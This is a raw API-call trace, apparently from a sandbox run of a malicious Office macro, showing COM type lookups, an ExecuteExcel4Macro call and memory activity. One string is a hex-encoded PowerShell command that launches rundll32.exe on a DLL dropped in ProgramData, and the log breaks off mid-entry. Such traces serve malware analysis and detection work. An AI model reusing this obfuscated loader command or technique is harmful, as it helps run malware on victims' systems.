IUnknown:QueryInterface (in: This=0xa031408, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dcb38 | out: ppvObject=0x1dcb38*=0x0) returned 0x80004002 [0157.585] ITypeInfo:RemoteGetTypeAttr (in: This=0xa031408, ppTypeAttr=0x1dcb18, pDummy=0x10 | out: ppTypeAttr=0x1dcb18, pDummy=0x10) returned 0x0 [0157.585] ITypeInfo:LocalReleaseTypeAttr (This=0xa031408) returned 0x0 [0157.586] ITypeInfo:GetImplTypeFlags (in: This=0xa031408, index=0x0, pImplTypeFlags=0x1dcb34 | out: pImplTypeFlags=0x1dcb34*=1) returned 0x0 [0157.586] ITypeInfo:GetRefTypeOfImplType (in: This=0xa031408, index=0x0, pRefType=0x1dcb10 | out: pRefType=0x1dcb10*=0x9580) returned 0x0 [0157.586] ITypeInfo:GetRefTypeInfo (in: This=0xa031408, hreftype=0x9580, ppTInfo=0x1dcb08 | out: ppTInfo=0x1dcb08*=0xa02adf0) returned 0x0 [0157.586] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02adf0, ppTypeAttr=0x1dcb18, pDummy=0x1dcaf0 | out: ppTypeAttr=0x1dcb18, pDummy=0x1dcaf0*=0x1dcb40) returned 0x0 [0157.586] ITypeInfo:LocalReleaseTypeAttr (This=0xa02adf0) returned 0x0 [0157.586] ITypeInfo:GetRefTypeOfImplType (in: This=0xa02adf0, index=0xffffffff, pRefType=0x1dcb10 | out: pRefType=0x1dcb10*=0xfffffffe) returned 0x0 [0157.586] ITypeInfo:GetRefTypeInfo (in: This=0xa02adf0, hreftype=0xfffffffe, ppTInfo=0x1dcbe8 | out: ppTInfo=0x1dcbe8*=0xa02ae48) returned 0x0 [0157.586] IUnknown:Release (This=0xa02adf0) returned 0x2 [0157.586] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dcb88 | out: ppvObject=0x1dcb88*=0x0) returned 0x80004002 [0157.586] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dcb90 | out: ppvObject=0x1dcb90*=0x0) returned 0x80004002 [0157.586] ITypeInfo:GetTypeComp (in: This=0xa02ae48, ppTComp=0x1dcb98 | out: ppTComp=0x1dcb98*=0xa02ae50) returned 0x0 [0157.586] IMalloc:Alloc (This=0x7fefecb5380, cb=0x38) returned 0x9ff4110 [0157.586] IUnknown:AddRef (This=0xa02ae50) returned 0x4 [0157.586] IUnknown:Release (This=0xa02ae50) returned 0x3 [0157.586] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9ac66d0, cb=0xc0) returned 0x9ca0a30 [0157.586] IUnknown:Release (This=0xa02ae48) returned 0x2 [0157.586] IUnknown:Release (This=0xa031408) returned 0x1 [0157.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a0096, cbMultiByte=19, lpWideCharStr=0x1dc680, cchWideChar=20 | out: lpWideCharStr="ExecuteExcel4Macro") returned 19 [0157.586] ITypeComp:RemoteBind (in: This=0xa02ae50, szName="ExecuteExcel4Macro", lHashVal=0x104fc8, wFlags=0x1, ppTInfo=0x1dc638, pDescKind=0x1dc64c, ppFuncDesc=0x1dc650, ppVarDesc=0x1dc660, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc638*=0xa02ae48, pDescKind=0x1dc64c*=1, ppFuncDesc=0x1dc650, ppVarDesc=0x1dc660, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.586] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02ae48, ppTypeAttr=0x1dc640, pDummy=0x1 | out: ppTypeAttr=0x1dc640, pDummy=0x1) returned 0x0 [0157.586] ITypeInfo:LocalReleaseTypeAttr (This=0xa02ae48) returned 0x0 [0157.586] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02ae48, ppTypeAttr=0x1dc3f0, pDummy=0x0 | out: ppTypeAttr=0x1dc3f0, pDummy=0x0) returned 0x0 [0157.586] ITypeInfo:LocalReleaseTypeAttr (This=0xa02ae48) returned 0x0 [0157.587] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc4a0 | out: ppvObject=0x1dc4a0*=0xa02ae48) returned 0x0 [0157.587] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa02ae48, memid=350, invkind=1, pFuncIndex=0x1dc4e0 | out: pFuncIndex=0x1dc4e0*=0x1c) returned 0x0 [0157.587] ITypeInfo2:GetFuncCustData (in: This=0xa02ae48, index=0x1c, GUID=0x7fee51d3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1dc4f8 | out: pVarVal=0x1dc4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1dc5a0, varVal2=0xa026218)) returned 0x0 [0157.587] IUnknown:Release (This=0xa02ae48) returned 0x3 [0157.587] IUnknown:AddRef (This=0xa02ae48) returned 0x4 [0157.587] ITypeInfo:LocalReleaseFuncDesc (This=0xa02ae48) returned 0x0 [0157.587] IUnknown:Release (This=0xa02ae48) returned 0x3 [0157.587] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc6f8 | out: ppvObject=0x1dc6f8*=0x0) returned 0x80004002 [0157.587] IUnknown:AddRef (This=0xa02ae48) returned 0x4 [0157.587] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc680 | out: ppvObject=0x1dc680*=0x0) returned 0x80004002 [0157.587] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc650 | out: ppvObject=0x1dc650*=0x0) returned 0x80004002 [0157.587] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc640 | out: ppvObject=0x1dc640*=0x0) returned 0x80004002 [0157.587] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc648 | out: ppvObject=0x1dc648*=0x0) returned 0x80004002 [0157.587] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02ae48, ppTypeAttr=0x1dc678, pDummy=0x10 | out: ppTypeAttr=0x1dc678, pDummy=0x10) returned 0x0 [0157.587] ITypeInfo:LocalReleaseTypeAttr (This=0xa02ae48) returned 0x0 [0157.587] IUnknown:AddRef (This=0xa02ae48) returned 0x5 [0157.587] IUnknown:Release (This=0xa02ae48) returned 0x4 [0157.587] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc868 | out: ppvObject=0x1dc868*=0x0) returned 0x80004002 [0157.587] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc860 | out: ppvObject=0x1dc860*=0x0) returned 0x80004002 [0157.588] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x991f1e0 [0157.588] IMalloc:Free (This=0x7fefecb5380, pv=0x991f1e0) [0157.588] IUnknown:AddRef (This=0xa02ae48) returned 0x5 [0157.588] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02ae48, ppTypeAttr=0x1dcab8, pDummy=0x6793de2 | out: ppTypeAttr=0x1dcab8, pDummy=0x6793de2*=0x0) returned 0x0 [0157.588] ITypeInfo:LocalReleaseTypeAttr (This=0xa02ae48) returned 0x0 [0157.588] IUnknown:Release (This=0xa02ae48) returned 0x4 [0157.588] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.588] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.588] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.588] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.588] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.588] GetCurrentProcess () returned 0xffffffffffffffff [0157.588] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x5c) returned 1 [0157.588] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.588] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02ae48, ppTypeAttr=0x1dc050, pDummy=0x0 | out: ppTypeAttr=0x1dc050, pDummy=0x0) returned 0x0 [0157.588] ITypeInfo:LocalReleaseTypeAttr (This=0xa02ae48) returned 0x0 [0157.588] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x67a0000 [0157.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f1f4, cbMultiByte=224, lpWideCharStr=0x67a197c, cchWideChar=450 | out: lpWideCharStr="70 6f 77 65 72 73 68 65 6c 6c 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c 2c 53 74 61 72 74") returned 224 [0157.589] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c56600 [0157.590] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0157.590] IUnknown:Release (This=0xa02b058) returned 0x1 [0157.590] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.590] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.590] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.590] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.590] GetCurrentProcess () returned 0xffffffffffffffff [0157.590] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x54) returned 1 [0157.590] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f2e4, cbMultiByte=35, lpWideCharStr=0x67a23b2, cchWideChar=72 | out: lpWideCharStr="{{}}(\"[]\", \"{^}\", \"JCCJ\", \"[*]\", 0)") returned 35 [0157.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f30c, cbMultiByte=4, lpWideCharStr=0x67a245e, cchWideChar=10 | out: lpWideCharStr="{{}}") returned 4 [0157.590] IUnknown:AddRef (This=0xa121698) returned 0x4 [0157.590] IUnknown:Release (This=0xa121698) returned 0x3 [0157.590] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc988 | out: ppvObject=0x1dc988*=0x0) returned 0x80004002 [0157.590] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc980 | out: ppvObject=0x1dc980*=0x0) returned 0x80004002 [0157.590] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc1c0, pIndex=0x0 | out: ppTLib=0x1dc1c0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.590] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc1d0, pDummy=0x0 | out: ppTLibAttr=0x1dc1d0, pDummy=0x0) returned 0x0 [0157.590] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.590] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.590] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc1c0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.591] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc1c0, pbstrName=0x0, pwOrdinal=0x1dc1e0 | out: pBstrDllName=0x1dc1c0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc1e0*=0xc450) returned 0x0 [0157.591] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000) returned 0x0 [0157.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f31e, cbMultiByte=2, lpWideCharStr=0x67a2a9c, cchWideChar=6 | out: lpWideCharStr="[]") returned 2 [0157.591] IUnknown:AddRef (This=0xa121698) returned 0x4 [0157.591] IUnknown:Release (This=0xa121698) returned 0x3 [0157.591] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc988 | out: ppvObject=0x1dc988*=0x0) returned 0x80004002 [0157.591] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc980 | out: ppvObject=0x1dc980*=0x0) returned 0x80004002 [0157.591] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc1c0, pIndex=0x0 | out: ppTLib=0x1dc1c0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.591] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc1d0, pDummy=0x0 | out: ppTLibAttr=0x1dc1d0, pDummy=0x0) returned 0x0 [0157.591] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.591] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.591] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc1c0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.591] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc1c0, pbstrName=0x0, pwOrdinal=0x1dc1e0 | out: pBstrDllName=0x1dc1c0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc1e0*=0xc450) returned 0x0 [0157.591] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000) returned 0x0 [0157.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f32e, cbMultiByte=3, lpWideCharStr=0x67a3146, cchWideChar=8 | out: lpWideCharStr="{^}") returned 3 [0157.591] IUnknown:AddRef (This=0xa121698) returned 0x4 [0157.591] IUnknown:Release (This=0xa121698) returned 0x3 [0157.591] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc988 | out: ppvObject=0x1dc988*=0x0) returned 0x80004002 [0157.591] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc980 | out: ppvObject=0x1dc980*=0x0) returned 0x80004002 [0157.592] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc1c0, pIndex=0x0 | out: ppTLib=0x1dc1c0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.592] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc1d0, pDummy=0x0 | out: ppTLibAttr=0x1dc1d0, pDummy=0x0) returned 0x0 [0157.592] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.592] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.592] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc1c0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.592] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc1c0, pbstrName=0x0, pwOrdinal=0x1dc1e0 | out: pBstrDllName=0x1dc1c0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc1e0*=0xc450) returned 0x0 [0157.592] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000) returned 0x0 [0157.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f340, cbMultiByte=3, lpWideCharStr=0x67a37f2, cchWideChar=8 | out: lpWideCharStr="[*]") returned 3 [0157.592] IUnknown:AddRef (This=0xa121698) returned 0x4 [0157.592] IUnknown:Release (This=0xa121698) returned 0x3 [0157.592] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc988 | out: ppvObject=0x1dc988*=0x0) returned 0x80004002 [0157.592] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc980 | out: ppvObject=0x1dc980*=0x0) returned 0x80004002 [0157.592] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc1c0, pIndex=0x0 | out: ppTLib=0x1dc1c0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.592] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc1d0, pDummy=0x0 | out: ppTLibAttr=0x1dc1d0, pDummy=0x0) returned 0x0 [0157.592] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.592] IUnknown:Release (This=0x9ab5f00) returned 0xa [0157.592] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc1c0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.592] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc1c0, pbstrName=0x0, pwOrdinal=0x1dc1e0 | out: pBstrDllName=0x1dc1c0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc1e0*=0xc450) returned 0x0 [0157.592] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000) returned 0x0 [0157.592] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0157.592] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.592] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc988 | out: ppvObject=0x1dc988*=0x0) returned 0x80004002 [0157.593] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc980 | out: ppvObject=0x1dc980*=0x0) returned 0x80004002 [0157.593] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0157.593] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dcb28, pDummy=0x0 | out: ppTypeAttr=0x1dcb28, pDummy=0x0) returned 0x0 [0157.593] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.593] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.593] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.593] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.593] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.593] GetCurrentProcess () returned 0xffffffffffffffff [0157.593] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x4c) returned 1 [0157.593] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.593] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc0c0, pDummy=0x0 | out: ppTypeAttr=0x1dc0c0, pDummy=0x0) returned 0x0 [0157.593] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.593] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa12b820, cb=0xc0) returned 0x9ca0b00 [0157.593] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x75a0000 [0157.594] IUnknown:AddRef (This=0xa031408) returned 0x2 [0157.594] IUnknown:QueryInterface (in: This=0xa031408, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dcb38 | out: ppvObject=0x1dcb38*=0x0) returned 0x80004002 [0157.594] ITypeInfo:RemoteGetTypeAttr (in: This=0xa031408, ppTypeAttr=0x1dcb18, pDummy=0x10 | out: ppTypeAttr=0x1dcb18, pDummy=0x10) returned 0x0 [0157.594] ITypeInfo:LocalReleaseTypeAttr (This=0xa031408) returned 0x0 [0157.594] ITypeInfo:GetImplTypeFlags (in: This=0xa031408, index=0x0, pImplTypeFlags=0x1dcb34 | out: pImplTypeFlags=0x1dcb34*=1) returned 0x0 [0157.594] ITypeInfo:GetRefTypeOfImplType (in: This=0xa031408, index=0x0, pRefType=0x1dcb10 | out: pRefType=0x1dcb10*=0x9580) returned 0x0 [0157.594] ITypeInfo:GetRefTypeInfo (in: This=0xa031408, hreftype=0x9580, ppTInfo=0x1dcb08 | out: ppTInfo=0x1dcb08*=0xa02adf0) returned 0x0 [0157.594] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02adf0, ppTypeAttr=0x1dcb18, pDummy=0x1dcaf0 | out: ppTypeAttr=0x1dcb18, pDummy=0x1dcaf0*=0x1dcb40) returned 0x0 [0157.594] ITypeInfo:LocalReleaseTypeAttr (This=0xa02adf0) returned 0x0 [0157.595] ITypeInfo:GetRefTypeOfImplType (in: This=0xa02adf0, index=0xffffffff, pRefType=0x1dcb10 | out: pRefType=0x1dcb10*=0xfffffffe) returned 0x0 [0157.595] ITypeInfo:GetRefTypeInfo (in: This=0xa02adf0, hreftype=0xfffffffe, ppTInfo=0x1dcbe8 | out: ppTInfo=0x1dcbe8*=0xa02ae48) returned 0x0 [0157.595] IUnknown:Release (This=0xa02adf0) returned 0x5 [0157.595] IUnknown:Release (This=0xa02ae48) returned 0x4 [0157.595] IUnknown:Release (This=0xa031408) returned 0x1 [0157.595] IUnknown:AddRef (This=0xa02ae48) returned 0x5 [0157.595] IUnknown:Release (This=0xa02ae48) returned 0x4 [0157.595] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc868 | out: ppvObject=0x1dc868*=0x0) returned 0x80004002 [0157.595] IUnknown:QueryInterface (in: This=0xa02ae48, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, 